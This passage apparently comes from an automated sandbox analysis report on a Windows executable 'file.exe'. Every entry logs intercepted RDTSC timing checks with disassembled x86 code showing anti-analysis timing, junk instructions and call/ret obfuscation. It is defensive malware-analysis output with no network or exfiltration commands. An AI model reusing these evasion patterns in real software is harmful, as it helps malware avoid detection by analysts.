                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5700D6 second address: 5700FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3F244F40E9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572199 second address: 57219E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5749DA second address: 5749F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5749F7 second address: 5749FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5749FD second address: 574A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574F83 second address: 575011 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3F24EE2704h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F3F24EE26F8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D1C9Fh], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F3F24EE26F8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D2778h] 0x00000050 xchg eax, esi 0x00000051 jmp 00007F3F24EE2700h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F3F24EE2704h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D512 second address: 52D516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5729A5 second address: 5729CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F3F24EE2722h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3F24EE2704h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D516 second address: 52D51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D51A second address: 52D525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578611 second address: 578629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnp 00007F3F244F40D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F3F244F40D6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577851 second address: 577855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578629 second address: 57862D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5787D4 second address: 5787E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3F24EE26FEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5787E9 second address: 578885 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F3F244F40E3h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F3F244F40D8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 sub dword ptr [ebp+1244D9F8h], ebx 0x00000036 cld 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov ebx, 33C97DE1h 0x00000043 mov ebx, ecx 0x00000045 mov eax, dword ptr [ebp+122D0A41h] 0x0000004b pushad 0x0000004c mov dword ptr [ebp+122D2164h], eax 0x00000052 mov edi, dword ptr [ebp+122D21CEh] 0x00000058 popad 0x00000059 push FFFFFFFFh 0x0000005b mov di, B6A8h 0x0000005f nop 0x00000060 jmp 00007F3F244F40DEh 0x00000065 push eax 0x00000066 pushad 0x00000067 jmp 00007F3F244F40E6h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B865 second address: 57B869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B869 second address: 57B86D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B86D second address: 57B8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F3F24EE26F8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F3F24EE26F8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 or ebx, 27775E13h 0x00000046 sub ebx, 47F2824Fh 0x0000004c xchg eax, esi 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B8D0 second address: 57B8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B8D4 second address: 57B8E1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B8E1 second address: 57B8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F3F244F40E0h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C8AB second address: 57C94A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2709h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jns 00007F3F24EE2706h 0x00000011 pop esi 0x00000012 nop 0x00000013 mov bl, al 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F3F24EE26F8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 push esi 0x00000032 mov dword ptr [ebp+122D222Dh], edx 0x00000038 pop ebx 0x00000039 mov edi, dword ptr [ebp+122D2778h] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F3F24EE26F8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b xchg eax, esi 0x0000005c pushad 0x0000005d push ecx 0x0000005e jmp 00007F3F24EE26FBh 0x00000063 pop ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 push esi 0x00000067 pop esi 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57BAD6 second address: 57BAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F3F244F40DAh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3F244F40DAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57BAF5 second address: 57BAFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C94A second address: 57C96E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3F244F40E8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C96E second address: 57C974 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C974 second address: 57C991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F244F40E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D888 second address: 57D892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3F24EE26F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D892 second address: 57D896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D896 second address: 57D8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b cmc 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D217Eh], edi 0x00000014 push edx 0x00000015 sbb ebx, 74E559DBh 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DAB2 second address: 57DABC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3F244F40DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F818 second address: 57F81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F81C second address: 57F86B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edi, di 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F3F244F40D8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007F3F244F40E7h 0x0000002d push 00000000h 0x0000002f movsx ebx, bx 0x00000032 push eax 0x00000033 push edi 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581730 second address: 581748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581748 second address: 58174D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58174D second address: 5817E2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3F24EE26FCh 0x00000008 js 00007F3F24EE26F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 or dword ptr [ebp+122D2B9Ah], eax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F3F24EE26F8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F3F24EE26F8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov ebx, dword ptr [ebp+122D2888h] 0x00000055 pushad 0x00000056 jmp 00007F3F24EE2704h 0x0000005b cmc 0x0000005c popad 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F3F24EE2706h 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5817E2 second address: 581806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3F244F40DDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584F36 second address: 584F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EAA4 second address: 57EAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EAAA second address: 57EAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586E40 second address: 586E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3F244F40D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EAB5 second address: 57EABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5850B4 second address: 5850B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586E4A second address: 586EA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D1843h], esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F3F24EE26F8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F3F24EE26F8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 or di, 49ACh 0x0000004c xchg eax, esi 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586EA8 second address: 586EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586EAC second address: 586ED2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3F24EE2708h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586ED2 second address: 586ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586ED6 second address: 586EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586EDA second address: 586EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 587134 second address: 587139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A0F0 second address: 58A0F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52BA1B second address: 52BA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52BA1F second address: 52BA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52BA23 second address: 52BA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F3F24EE26FAh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F3F24EE26F6h 0x0000001d popad 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52BA44 second address: 52BA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E50A second address: 58E51E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jl 00007F3F24EE26F6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592041 second address: 59204C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59204C second address: 592067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F24EE26FDh 0x00000009 jmp 00007F3F24EE26FAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5921B3 second address: 5921B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5959DB second address: 595A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F3F24EE2709h 0x0000000f pop edi 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F3F24EE2706h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3F24EE2708h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597FFD second address: 598005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 598005 second address: 598009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D74E second address: 59D754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D754 second address: 59D77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3F24EE26F6h 0x0000000a popad 0x0000000b js 00007F3F24EE26F8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3F24EE26FCh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D77A second address: 59D784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3F244F40D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D784 second address: 59D795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBDE second address: 59CBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBE4 second address: 59CBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBEA second address: 59CBF1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE41 second address: 59CE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE47 second address: 59CE4D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE4D second address: 59CE53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE53 second address: 59CE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE57 second address: 59CE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE5B second address: 59CE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE61 second address: 59CE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3F24EE26FDh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jnc 00007F3F24EE270Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CE9A second address: 59CE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A37C4 second address: 5A37DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3F24EE2703h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2809 second address: 5A280F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A280F second address: 5A281F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3F24EE26F6h 0x00000008 ja 00007F3F24EE26F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2AC3 second address: 5A2ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
